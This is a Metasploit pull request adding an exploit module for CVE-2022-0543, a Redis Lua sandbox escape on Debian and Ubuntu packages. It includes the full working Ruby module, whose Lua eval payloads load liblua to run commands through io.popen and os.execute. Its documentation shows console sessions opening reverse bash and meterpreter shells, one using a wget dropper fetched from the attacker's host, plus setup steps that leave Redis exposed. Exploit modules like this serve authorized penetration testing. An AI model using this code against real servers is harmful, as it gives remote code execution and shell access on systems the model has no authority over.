### PR TITLE
Redis Sandbox Escape RCE (CVE-2022-0543)

### DIFF
--- a/documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
+++ b/documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
@@ -4,7 +4,7 @@
 
 This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
 vulnerability was introduced by Debian and Ubuntu Redis packages that
-insufficiently sanitizied the Lua environment. The maintainers failed to
+insufficiently sanitized the Lua environment. The maintainers failed to
 disable the package interface, allowing attackers to load arbitrary libraries.
 
 On a typical `redis` deployment (not docker), this module achieves execution

--- a/documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
+++ b/documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
@@ -1,0 +1,206 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
+vulnerability was introduced by Debian and Ubuntu Redis packages that
+insufficiently santizied the Lua environment. The maintainers failed to
+disable the package interface, allowing attackers to load arbitrary libraries.
+
+On a typical `redis` deployment (not docker), this module achieves execution
+as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the
+"MemoryDenyWriteExecute" permission, which limits some of what an attacker can
+do. For example, staged meterpreter will fail when attempting to use mprotect.
+As such, stageless meterpreter is the preferred payload.
+
+Redis can be configured with authentication or not. This module will work with
+either configuration (provided you provide the correct authentication details).
+This vulnerability could theoritically be exploited across a few architectures:
+i386, arm, ppc, etc. However, the module only supports x86_64, which is likely
+to be the most popular version.
+
+### Setup
+
+I'll explain two setup scenarios. I'll first go through Docker since it's so easy
+but I don't think it's realistically the most likely deployment. I'll then
+explain an Ubuntu 20.04 installation.
+
+#### Docker
+
+This will deploy an official Ubuntu Redis image. To get a vulnerable image do the
+following:
+
+1. `docker pull ubuntu/redis:6.0-21.04_edge`
+1. `docker run -d --name vuln_redis -e TZ=UTC -p 6379:6379 -e REDIS_PASSWORD=mypassword ubuntu/redis:6.0-21.04_edge`
+
+The vulnerable Redis will now be on port 6379. Note that this version uses a password.
+
+To deploy a patched version, do the following:
+
+1. `docker pull ubuntu/redis:latest`
+1. `sudo docker run -d --name fixed_redis -e TZ=UTC -p 6379:6379 -e REDIS_PASSWORD=mypassword ubuntu/redis:latest`
+
+#### Ubuntu 20.04
+
+1. `sudo apt-get install redis-tools=5:5.0.7-2`
+1. `sudo apt-get install redis-server=5:5.0.7-2`
+1. `sudo nano /etc/redis/redis.conf` -> Comment out "bind" and change "protected-mode" to no.
+1. `sudo service redis restart`
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/redis/redis_debian_sandbox_escape`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: If needed - `set PASSWORD <password>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module receives a reverse shell
+
+## Options
+
+### LUA_LIB
+
+The path to the Lua library to load. The default, `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`,
+appears to be valid for both Ubuntu and Debian but I made it optional in case some edge
+case crops up that I hadn't considered.
+
+### PASSWORD
+
+The password, if needed, to use with the Redis AUTH command.
+
+## Scenarios
+
+### Successful exploitation of Redis on Ubuntu 20.04 for reverse bash shell
+
+```
+msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set RHOST 10.0.0.22
+RHOST => 10.0.0.22
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
+[+] 10.0.0.22:6379 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] 10.0.0.22:6379        - Running automatic check ("set AutoCheck false" to disable)
+[+] 10.0.0.22:6379        - The target is vulnerable. Successfully executed the 'id' command.
+[*] 10.0.0.22:6379        - Executing Unix Command for cmd/unix/reverse_bash
+[+] 10.0.0.22:6379        - Exploit complete!
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.22:60844 ) at 2022-04-26 03:17:39 -0700
+
+id
+uid=127(redis) gid=134(redis) groups=134(redis)
+uname -a
+Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Successful exploitation of Redis on Ubuntu 20.04 for reverse meterpreter
+
+```
+msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set RHOST 10.0.0.22
+RHOST => 10.0.0.22
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set target 1
+target => 1
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] 10.0.0.22:6379        - Running automatic check ("set AutoCheck false" to disable)
+[+] 10.0.0.22:6379        - The target is vulnerable. Successfully executed the 'id' command.
+[*] 10.0.0.22:6379        - Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
+[*] 10.0.0.22:6379        - Using URL: http://10.0.0.2:8080/mBTPVKr7pZVP
+[*] 10.0.0.22:6379        - Client 10.0.0.22 (Wget/1.20.3 (linux-gnu)) requested /mBTPVKr7pZVP
+[*] 10.0.0.22:6379        - Sending payload to 10.0.0.22 (Wget/1.20.3 (linux-gnu))
+[+] 10.0.0.22:6379        - Exploit complete!
+[*] 10.0.0.22:6379        - Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.22:60848 ) at 2022-04-26 03:21:22 -0700
+[*] 10.0.0.22:6379        - Server stopped.
+
+meterpreter > shell
+Process 13120 created.
+Channel 1 created.
+id
+uid=127(redis) gid=134(redis) groups=134(redis)
+uname -a
+Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Successful exploitation of Redis in Ubuntu Docker for reverse bash shell
+
+```
+msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set PASSWORD mypassword
+PASSWORD => mypassword
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
+[+] 127.0.0.1:6379 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] 127.0.0.1:6379        - Running automatic check ("set AutoCheck false" to disable)
+[+] 127.0.0.1:6379        - The target is vulnerable. Successfully executed the 'id' command.
+[*] 127.0.0.1:6379        - Executing Unix Command for cmd/unix/reverse_bash
+[+] 127.0.0.1:6379        - Exploit complete!
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 172.17.0.2:33148 ) at 2022-04-26 03:23:32 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux 9c7526769ad1 5.13.0-40-generic #45-Ubuntu SMP Tue Mar 29 14:48:14 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Failed exploitation due to wrong password
+
+```
+msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set PASSWORD lolwat
+PASSWORD => lolwat
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
+[*] 127.0.0.1:6379 - Cannot reliably check exploitability. Failed authentication.
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > 
+```
+
+### Failed exploitation of patched Redis on Debian 11
+
+```
+msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set RHOST 10.0.0.24
+RHOST => 10.0.0.24
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
+[*] 10.0.0.24:6379 - The target is not exploitable. Could not execute 'id' on the remote target.
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > 
+```
+
+### Failed exploitation of not-vulnerable Ubuntu 18.04 i386.
+
+```
+msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set RHOST 10.0.0.25
+RHOST => 10.0.0.25
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
+[*] 10.0.0.25:6379 - The target is not exploitable. The reported version is unaffected: 4.0.9
+msf6 exploit(linux/redis/redis_debian_sandbox_escape) >
+```

--- a/documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
+++ b/documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
@@ -4,7 +4,7 @@
 
 This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
 vulnerability was introduced by Debian and Ubuntu Redis packages that
-insufficiently santizied the Lua environment. The maintainers failed to
+insufficiently sanitizied the Lua environment. The maintainers failed to
 disable the package interface, allowing attackers to load arbitrary libraries.
 
 On a typical `redis` deployment (not docker), this module achieves execution
@@ -15,7 +15,7 @@ As such, stageless meterpreter is the preferred payload.
 
 Redis can be configured with authentication or not. This module will work with
 either configuration (provided you provide the correct authentication details).
-This vulnerability could theoritically be exploited across a few architectures:
+This vulnerability could theoretically be exploited across a few architectures:
 i386, arm, ppc, etc. However, the module only supports x86_64, which is likely
 to be the most popular version.
 

--- a/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
+++ b/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
           vulnerability was introduced by Debian and Ubuntu Redis packages that
-          insufficiently sanitizied the Lua environment. The maintainers failed to
+          insufficiently sanitized the Lua environment. The maintainers failed to
           disable the package interface, allowing attackers to load arbitrary libraries.
 
           On a typical `redis` deployment (not docker), this module achieves execution

--- a/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
+++ b/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
           vulnerability was introduced by Debian and Ubuntu Redis packages that
-          insufficiently santizied the Lua environment. The maintainers failed to
+          insufficiently sanitizied the Lua environment. The maintainers failed to
           disable the package interface, allowing attackers to load arbitrary libraries.
 
           On a typical `redis` deployment (not docker), this module achieves execution
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
           Redis can be configured with authentication or not. This module will work with
           either configuration (provided you provide the correct authentication details).
-          This vulnerability could theoritically be exploited across a few architectures:
+          This vulnerability could theoretically be exploited across a few architectures:
           i386, arm, ppc, etc. However, the module only supports x86_64, which is likely
           to be the most popular version.
         },

--- a/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
+++ b/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
@@ -174,8 +174,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # On success, there is no meaningful response. I think this is okay because we already have
     # solid proof of execution in check.
-    resp = do_os_exec(cmd).nil?
-    fail_with(Failure::UnexpectedReply, 'The server did not respond') if resp.nil?
+    resp = do_os_exec(cmd)
+    fail_with(Failure::UnexpectedReply, "The server did not respond as expected: #{resp}") unless resp.nil? || resp.include?('$-1')
     print_good('Exploit complete!')
   ensure
     disconnect

--- a/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
+++ b/modules/exploits/linux/redis/redis_debian_sandbox_escape.rb
@@ -1,0 +1,193 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+  include Msf::Auxiliary::Redis
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Redis Lua Sandbox Escape',
+        'Description' => %q{
+          This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
+          vulnerability was introduced by Debian and Ubuntu Redis packages that
+          insufficiently santizied the Lua environment. The maintainers failed to
+          disable the package interface, allowing attackers to load arbitrary libraries.
+
+          On a typical `redis` deployment (not docker), this module achieves execution
+          as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the
+          "MemoryDenyWriteExecute" permission, which limits some of what an attacker can
+          do. For example, staged meterpreter will fail when attempting to use mprotect.
+          As such, stageless meterpreter is the preferred payload.
+
+          Redis can be configured with authentication or not. This module will work with
+          either configuration (provided you provide the correct authentication details).
+          This vulnerability could theoritically be exploited across a few architectures:
+          i386, arm, ppc, etc. However, the module only supports x86_64, which is likely
+          to be the most popular version.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Reginaldo Silva', # Vulnerability discovery and PoC
+          'jbaines-r7' # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2022-0543' ],
+          [ 'URL', 'https://www.lua.org/pil/8.2.html'],
+          [ 'URL', 'https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce' ],
+          [ 'URL', 'https://www.debian.org/security/2022/dsa-5081' ],
+          [ 'URL', 'https://ubuntu.com/security/CVE-2022-0543' ]
+        ],
+        'DisclosureDate' => '2022-02-18',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'MeterpreterTryToFork' => true,
+          'RPORT' => 6379
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('LUA_LIB', [true, 'LUA library path', '/usr/lib/x86_64-linux-gnu/liblua5.1.so.0']),
+      OptString.new('PASSWORD', [false, 'Redis AUTH password', 'mypassword'])
+    ])
+  end
+
+  # See https://github.com/rapid7/metasploit-framework/pull/13143
+  def has_check?
+    true # Overrides the override in Msf::Auxiliary::Scanner imported by Msf::Auxiliary::Redis
+  end
+
+  # Use popen to execute the desired command and read back the output. This
+  # is how the original PoC did it.
+  def do_popen(cmd)
+    exploit = "eval '" \
+      "local io_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_io\"); " \
+      'local io = io_l(); ' \
+      "local f = io.popen(\"#{cmd}\", \"r\"); " \
+      'local res = f:read("*a"); ' \
+      'f:close(); ' \
+      "return res' 0" \
+      "\n"
+    sock.put(exploit)
+    sock.get(read_timeout)
+  end
+
+  # Use os.execute to execute the desired command. This doesn't return any output, and likely
+  # isn't meaningfully more useful than do_open but I wanted to demonstrate other execution
+  # possibility not demonstrated by the original poc.
+  def do_os_exec(cmd)
+    exploit = "eval '" \
+      "local os_l = package.loadlib(\"#{datastore['LUA_LIB']}\", \"luaopen_os\"); " \
+      'local os = os_l(); ' \
+      "local f = os.execute(\"#{cmd}\"); " \
+      "' 0" \
+      "\n"
+
+    sock.put(exploit)
+    sock.get(read_timeout)
+  end
+
+  def check
+    connect
+
+    # Before we get crazy sending exploits over the wire, let's just check if this could
+    # plausiably be a vulnerable version. Using INFO we can check for:
+    #
+    # 1. 4 < Version < 6.1
+    # 2. OS contains Linux
+    # 3. redis_git_sha1:00000000
+    #
+    # We could probably fingerprint the build_id as well, but I'm worried I'll overlook at
+    # package somewhere and it's nice to get final verification via exploitation anyway.
+    info_output = redis_command('INFO')
+    return Exploit::CheckCode::Unknown('Failed authentication.') if info_output.nil?
+    return Exploit::CheckCode::Safe('Unaffected operating system') unless info_output.include? 'os:Linux'
+    return Exploit::CheckCode::Safe('Invalid git sha1') unless info_output.include? 'redis_git_sha1:00000000'
+
+    redis_version = info_output[/redis_version:(?<redis_version>\S+)/, :redis_version]
+    return Exploit::CheckCode::Safe('Could not extract a version number') if redis_version.nil?
+    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) < Rex::Version.new('5.0.0')
+    return Exploit::CheckCode::Safe("The reported version is unaffected: #{redis_version}") if Rex::Version.new(redis_version) >= Rex::Version.new('6.1.0')
+    return Exploit::CheckCode::Unknown('Unsupported architecture') unless info_output.include? 'x86_64'
+
+    # okay, looks like a worthy candidate. Attempt exploitation.
+    result = do_popen('id')
+    return Exploit::CheckCode::Vulnerable("Successfully executed the 'id' command.") unless result.nil? || result[/uid=.+ gid=.+ groups=.+/].nil?
+
+    Exploit::CheckCode::Safe("Could not execute 'id' on the remote target.")
+  ensure
+    disconnect
+  end
+
+  def execute_command(cmd, _opts = {})
+    connect
+
+    # force the redis mixin to handle auth for us
+    info_output = redis_command('INFO')
+    fail_with(Failure::NoAccess, 'The server did not respond') if info_output.nil?
+
+    # escape any single quotes
+    cmd = cmd.gsub("'", "\\\\'")
+
+    # On success, there is no meaningful response. I think this is okay because we already have
+    # solid proof of execution in check.
+    resp = do_os_exec(cmd).nil?
+    fail_with(Failure::UnexpectedReply, 'The server did not respond') if resp.nil?
+    print_good('Exploit complete!')
+  ensure
+    disconnect
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+end


### PR DESCRIPTION
This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. This has been [exploited in the wild](https://www.bleepingcomputer.com/news/security/public-redis-exploit-used-by-malware-gang-to-grow-botnet/). The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.

On a typical `redis` deployment (not docker), this module achieves execution as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload.

Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64 (mostly due to the lack of test targets), which is likely to be the most popular version.

## Failed Linting

I expect this to fail linting due to the `has_check?` call. However, this is required. See https://github.com/rapid7/metasploit-framework/pull/13143

## Other Weird Things

As mentioned above, the default Meterpreter is stageless due to the use of "MemoryDenyWriteExecute" otherwise causing the staged version to crash on failed mprotect. Technically, the Docker version could execute a staged Meterpreter but there is also no command stager (other than printf/echo and I don't want to make those options since they won't work in the normal case). And I guess I should clarify that means that `target 1` does not work against the Docker target but does work against a normal Ubuntu install. I think this is fine since actually exploitable targets in the wild, in my opinion, are far more likely to be non-Docker targets.

## Verification

Follow the setup steps in the documentation.

- [ ] `use exploit/linux/redis/redis_debian_sandbox_escape`
- [ ] `set RHOST <ip>`
- [ ] `set LHOST <ip>`
- [ ] If needed - `set PASSWORD <password>`
- [ ] `check`
- [ ] Verify the remote host is vulnerable.
- [ ] `run`
- [ ]  Verify the module receives a reverse shell

## PoC Video || GTFO

https://www.youtube.com/watch?v=N5J7laXlMuo

## PCAP || GTFO

[redis_exploitation.zip](https://github.com/rapid7/metasploit-framework/files/8562455/redis_exploitation.zip)
